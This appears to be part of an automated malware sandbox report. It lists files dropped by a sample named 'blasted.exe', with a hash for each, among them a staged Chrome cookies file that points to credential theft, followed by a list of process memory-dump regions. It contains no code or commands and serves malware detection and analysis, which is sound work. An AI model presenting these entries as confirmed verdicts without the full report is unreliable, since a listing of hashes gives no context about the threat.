66a90f7beaaa14c629fbd53754873b19ed99db9469566c43d0ca810ca48662f1

SHA512
1eb7e9be650cf837d74546f24d62263df4b89c985bd208ed52870afd7726f08c9e7412bb5a2dfae2cae01aeec156a2c28d4dc1398b84a5c7fc4035cb84c697d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
83d2d0a413aaa75f465eb40c7c057609

SHA1
a6cb76483b42b495c07b78938a594d4865af0a34

SHA256
13b2980d7c02f6c1dd2329a7c46e18b7178012d600afd589d6f2495acbd85a80

SHA512
fa8e80acdde9aa6f4bd63f6278b46527d04977f102ff39670e0eafa75566c852f667a843012e72547fb2b5a03cd3a738e95280a07e97745b86293e27303dfe84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f6f33ae41ff18891871a3e906d915eb4

SHA1
cf6ac704047ea22e450c3fa972d98111e43885bc

SHA256
0225284153c04eb74129e1fbd81e498496e4ac83a70e9f40944c72a9012e2c45

SHA512
799bf60838820fd51d2247317ea2e7c2dfe08dadcd9659e7d4d0ac0b944c6ef17916aedf99be1e09bf4c608610cd4c58ddedb455af4a5117dfda95ea66540840

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
520ff216c3f7d7c3d67393bea543fe23

SHA1
588939b12f373f3dcef0b9e5bbf4e8f578ef06ba

SHA256
88fce6a6dfcc22c2ea8eca77e2b43a15bc072bd79b7850c974a9930ca7ea74bf

SHA512
3374573132e1ac3bbcc99b9f2738296103cf8c39256018d18abccbe72921472825a2db4b660bf76d340242919e8cf433cb98d8031111a565c3a55db4143d6162

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e8eb51096d6f6781456fef7df731d97

SHA1
ec2aaf851a618fb43c3d040a13a71997c25bda43

SHA256
96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

SHA512
0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
4b63eba3f617236663b7615721cb0581

SHA1
5ca8ca657895b6ffa0540be66c1c6d48417456b4

SHA256
985b396dec0c00ed786affb70bba581dff9e4b2dc68251062cddc740fe6e55e3

SHA512
45021f9e20b799573741b4976a45569b70a8e3e49016f64e5813b4809a5e721d83028f74f538d3d350aeba16dddfa70acd1c25122e707ba06366eba2e485b380

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
de1cbc191bee1d162d00561785ff3e3f

SHA1
e65c6208aaeb730c3242fec9afbfe797fb464f66

SHA256
7eda0e7287adda6d5511bb314988c270a1ec05a6bd7fcbfab698ed7b4b195434

SHA512
af507d8a805f43842e87414b43c1a0f8973f3d663d2efeb0556b9d212741d159e2f0d0e0528588d9dba1278cca1efd37ab4d28c118c4424345191d0b016d2013

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
60a84ea8f3888e51bb0fe4856926a639

SHA1
43848b5a831f8fe7623694b36b17554b83770269

SHA256
5d219511d1091f4dc52ef6664815bcacf013c76b695bf2195aa439a6cc431504

SHA512
f6381deedc9612c96914173d948bd601192256c1b65a6b6be3c6664de84df64fb8740fa0205846e0380305bf5442e52991d134ff94b8edc899775befcc4a86ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
b68ab4ca7e39baffff644d4820c98f0c

SHA1
25aee3c71f29c4520c9a89a13ce47864b75ced4e

SHA256
974a01642047984dcc7429b685decc35b22bfb88926f25174f77721f4afaf676

SHA512
5c96c46ba870ced22f9956ecec737fe2a6d4d73a52a1db323b29a82324f3fbd298ecb0a79ce55828bcb9e813b64815bae137d480f26e9d69f6cf7830dfd4ab9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
fa21dd50b4e64421076f843031c8ccf7

SHA1
2c56e94f130c0d8d77116e939ffee4e37cf982bd

SHA256
e4f21aca1e12aafa8de7af24b79a75526e902c7d4b3fea5bdb6e723976997be3

SHA512
b8de2bfeb7af06c587dd1f424d410cf83471f31a55a3ea4c4481ce07ffd9bf66ddc1f7775ecd6ac65ac33baaec90ba5a208a9aefc84f31125a50dfb919982687

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0ac871344dc49ae49f13f0f88acb4868

SHA1
5a073862375c7e79255bb0eab32c635b57a77f98

SHA256
688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37

SHA512
ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
711b161528f4959c4b7463036c7324ec

SHA1
53b30cc796c0dfe0cd4c4406202a19139cb5407d

SHA256
7c077fb04d4911778ab648b657b43c9b464393d734dc7fa029ee0f085c6a5638

SHA512
565d0e3e229894de91ad37a16c261bf380e983ffda750f32e8ad361c0606c62043a0188f45d252fecabc6438bc9e7b2c424b101073162ba9633bacd03b42af9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
201a02fbba615c7b8004d14ada483d3e

SHA1
69fb4cb79c38c6755799e65d5752cc2a4e1a86f0

SHA256
b4c033fe3444f280ee37a23116bf174edf584fc20a2805a04de181c2a87da6bd

SHA512
6c8bbe9a3fc356637ad4c4cf7e73898be2c33723c3108919e86471bf6fcae12d4dcb6e7a532ca2baec980044fba504ee48de7c036f171b3fe655db06a52c7676

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1c0173315684736a04b0f5fe42957c12

SHA1
4f807eb7f4203987160503fc2144d4b3059d903c

SHA256
9200d881990608a02f4ea689d65c4c89893f08e209fed664442e18e6038283b8

SHA512
24f6ebc6cda60bfea224afc54d73fae5259f11d82b9ea47b3fb548214149036eef95279161eba28db0d74a4d397f7394c4c14adebe59dbd8da54ddf2dae242fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
894afb4ff3cd7ee1f69400e936f8fc9d

SHA1
aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51

SHA256
20948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9

SHA512
449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
43b2acc13ba1fe53d4f8859fe4f98cfd

SHA1
d917f316b17b600053802c3133dae8c2466a7f41

SHA256
b6630b73e4df2c36854f9480fe321ceb44fe45103d74a509c6d616c120509186

SHA512
8851c9fb935dfa61345903ec7ec859779a98c0fd40bd5ad8f2a103f68b59ee3e7527664cb44fb0b3b17fd21977ed554e9b0aca0b1c8fec8d51b565a29d48d5e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
11254e0a313e8d1c1687a6671872f6c9

SHA1
23911ffe3977e2c62ce44df0765f8a6f33b32d33

SHA256
beb58ec7a4f8b9432a26b42c1dc04ca415c1f15baaf9cf6c449375137d9097c7

SHA512
cf1b06737a440afb56580fac79cac47bc54e43f185796a05ee5db1839fcaa3336f5e1ef0fe455793fcbaf432ec0d1fbfaf6b73aaa4984d412a5a080fedea5b8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
b4096e51d53ef637a6d3884a96d57363

SHA1
339ef705d7044d8441959b25b07c9da6b51158f0

SHA256
a4097b6096ac1d742f7ea6d03080237f93f0ede525deeb960b1086afc107ca80

SHA512
b54f138966e4a0177550b36ff4ccd591e832957aa6fd044c3ad4fbd5dd1b8ce27c3c78d0e4f84164361fc691900ebc4bae809ff00eef9c91ab2f0c693859ec22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
38ecc5b95c11e5a77558753102979c51

SHA1
c0759b08ef377df9979d8835d8a7e464cd8eaf6b

SHA256
2eb69abe0af5a2fb5bb313533cef641e25016876b874353f7d737c7ad672c79e

SHA512
9bf4ce3bc097bdd0242bd105c936a9c9403d5ac83ec99e6a310591a7b8d26309485f3e0cdc4cba67c322f834c325a2b63a008adb078f3a3307094c4b68a48686

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\c8d4837e-0407-4641-9ad2-c88778c3a007.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\0yHExN5DoaVFcP5

Filesize
46KB

MD5
14ccc9293153deacbb9a20ee8f6ff1b7

SHA1
46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3

SHA256
3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511

SHA512
916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4xqwSymd1LRwWn

Filesize
20KB

MD5
4d7a298f7f093bd098bb32dacf92c889

SHA1
cb9fae27eaee8cface56229dc392d1445eb26065

SHA256
7093539b320dfd0b6368bf2b1920d78d3b31b84cd5d21f76633215e696a62b61

SHA512
a6299c53015f1534db753c3dc0c4a20e1dea95a5328c6e57da2ee578936d0c5abee82c5b8852b26b25bf7ddd878d1cdabbe63578aa47f6ce904f3caf2f43aea5

Download Submit
C:\Users\Admin\AppData\Local\Temp\OcXs5t4nsPK4lL6\Browsers\Cookies\Chrome Cookies.txt

Filesize
260B

MD5
671e7ed9a0290004c181780f54a99975

SHA1
19f3b6cd5d07a111321a25b95da7d69bc25484e0

SHA256
ed799d48974682d625460e1bc822cbbb4a996ee056553d436e8b8af9d3988a35

SHA512
c555d4c2c4eb2c5ede74160a492a6478e9a26645748dcc577225edd81a25464a6ec4795267420d663fb94f34d8c7db2bf75c852c0ef21143392a291c283ba5bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iriukzgi.uiu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\qMlQjUnkf7YxwCa

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3952_653658288\73b81462-80bc-458a-8a50-e3f238dc1ded.tmp

Filesize
150KB

MD5
14937b985303ecce4196154a24fc369a

SHA1
ecfe89e11a8d08ce0c8745ff5735d5edad683730

SHA256
71006a5311819fef45c659428944897184880bcdb571bf68c52b3d6ee97682ff

SHA512
1d03c75e4d2cd57eee7b0e93e2de293b41f280c415fb2446ac234fc5afd11fe2f2fcc8ab9843db0847c2ce6bd7df7213fcf249ea71896fbf6c0696e3f5aee46c

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3952_653658288\CRX_INSTALL\_locales\en\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Local\Temp\wUDhJlSzKzSU8tT

Filesize
20KB

MD5
22be08f683bcc01d7a9799bbd2c10041

SHA1
2efb6041cf3d6e67970135e592569c76fc4c41de

SHA256
451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457

SHA512
0eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936

Download Submit
C:\Users\Admin\Desktop\blasted.exe

Filesize
229KB

MD5
21e6f749bf59138d1528e64a34a88903

SHA1
4f2447e8476dad93e39aac775a7bf91c2c8cd4b8

SHA256
9952e7c346539dc361b2bda461eebf047ce00a2e3eb2bb3ab6f3fa0c0b5d87d5

SHA512
2cad6e33730a69bc31378ae4f502f37f6d8f6d1fd85c17830108ab6b056f1b5994bf8254530194df655e433689c2c22e53fea94c5958f8c1ee55f938a6e5486c

Download Submit
memory/1372-184-0x0000019F668E0000-0x0000019F66A2F000-memory.dmp

Filesize
1.3MB

Download
memory/1376-208-0x000001BAF0720000-0x000001BAF086F000-memory.dmp

Filesize
1.3MB

Download
memory/1520-7-0x0000022D5DA60000-0x0000022D5DA82000-memory.dmp

Filesize
136KB

Download
memory/2436-158-0x0000022919C00000-0x0000022919D4F000-memory.dmp

Filesize
1.3MB

Download
memory/2540-142-0x000001A575C70000-0x000001A575DBF000-memory.dmp

Filesize
1.3MB

Download
memory/2724-65-0x00000232F33D0000-0x00000232F33E2000-memory.dmp

Filesize
72KB

Download
memory/2724-6-0x00007FFB24D70000-0x00007FFB25832000-memory.dmp

Filesize
10.8MB

Download
memory/2724-5-0x00000232F0B20000-0x00000232F0B60000-memory.dmp

Filesize
256KB

Download
memory/2724-84-0x00007FFB24D70000-0x00007FFB25832000-memory.dmp

Filesize
10.8MB

Download
memory/2724-4-0x00007FFB24D73000-0x00007FFB24D75000-memory.dmp

Filesize
8KB

Download
memory/2724-30-0x00000232F3350000-0x00000232F33C6000-memory.dmp

Filesize
472KB

Download
memory/2724-31-0x00000232F10B0000-0x00000232F1100000-memory.dmp

Filesize
320KB

Download
memory/2724-32-0x00000232F31C0000-0x00000232F31DE000-memory.dmp

Filesize
120KB

Download
memory/2724-64-0x00000232F10A0000-0x00000232F10AA000-memory.dmp

Filesize
40KB

Download
memory/2860-263-0x0000010F52260000-0x0000010F523AF000-memory.dmp

Filesize
1.3MB

Download
memory/2932-251-0x0000023C6F770000-0x0000023C6F771000-memory.dmp

Filesize
4KB

Download
memory/2932-249-0x0000023C6F770000-0x0000023C6F771000-memory.dmp

Filesize
4KB

Download
memory/2932-237-0x0000023C6F770000-0x0000023C6F771000-memory.dmp

Filesize
4KB

Download
memory/2932-239-0x0000023C6F770000-0x0000023C6F771000-memory.dmp

Filesize
4KB

Download
memory/2932-238-0x0000023C6F770000-0x0000023C6F771000-memory.dmp

Filesize
4KB

Download
memory/2932-252-0x0000023C6F770000-0x0000023C6F771000-memory.dmp

Filesize
4KB

Download
memory/2932-247-0x0000023C6F770000-0x0000023C6F771000-memory.dmp

Filesize
4KB

Download
memory/2932-246-0x0000023C6F770000-0x0000023C6F771000-memory.dmp

Filesize
4KB

Download
memory/2932-248-0x0000023C6F770000-0x0000023C6F771000-memory.dmp

Filesize
4KB

Download
memory/2932-250-0x0000023C6F770000-0x0000023C6F771000-memory.dmp

Filesize
4KB

Download
memory/3380-131-0x000001E465580000-0x000001E4656CF000-memory.dmp

Filesize
1.3MB

Download
memory/3580-306-0x0000018239850000-0x000001823999F000-memory.dmp

Filesize
1.3MB

Download
memory/4196-107-0x000001B8AFE20000-0x000001B8AFF6F000-memory.dmp

Filesize
1.3MB

Download
memory/4548-918-0x0000029C8DFA0000-0x0000029C8DFA1000-memory.dmp

Filesize
4KB

Download
memory/4548-917-0x0000029C8DFA0000-0x0000029C8DFA1000-memory.dmp

Filesize
4KB

Download
memory/4548-915-0x0000029C8DFA0000-0x0000029C8DFA1000-memory.dmp

Filesize
4KB

Download
memory/4548-916-0x0000029C8DFA0000-0x0000029C8DFA1000-memory.dmp

Filesize
4KB

Download
memory/4548-908-0x0000029C8DFA0000-0x0000029C8DFA1000-memory.dmp

Filesize
4KB

Download
memory/4548-910-0x0000029C8DFA0000-0x0000029C8DFA1000-memory.dmp

Filesize
4KB

Download
memory/4548-909-0x0000029C8DFA0000-0x0000029C8DFA1000-memory.dmp

Filesize
4KB

Download
memory/4548-920-0x0000029C8DFA0000-0x0000029C8DFA1000-memory.dmp

Filesize
4KB

Download
memory/4548-919-0x0000029C8DFA0000-0x0000029C8DFA1000-memory.dmp

Filesize
4KB

Download
memory/4776-96-0x0000016B66A10000-0x0000016B66B5F000-memory.dmp

Filesize
1.3MB

Download
memory/4864-295-0x000001B74A420000-0x000001B74A56F000-memory.dmp

Filesize
1.3MB

Download
memory/4980-274-0x000001EC5C6F0000-0x000001EC5C83F000-memory.dmp

Filesize
1.3MB

Download
memory/5604-219-0x000001EAFD960000-0x000001EAFDAAF000-memory.dmp

Filesize
1.3MB

Download
memory/5608-235-0x00000183C8C50000-0x00000183C8D9F000-memory.dmp

Filesize
1.3MB

Download
memory/5784-322-0x0000019564870000-0x00000195649BF000-memory.dmp

Filesize
1.3MB

Download
memory/5940-173-0x000001C3A81F0000-0x000001C3A833F000-memory.dmp

Filesize
1.3MB

Download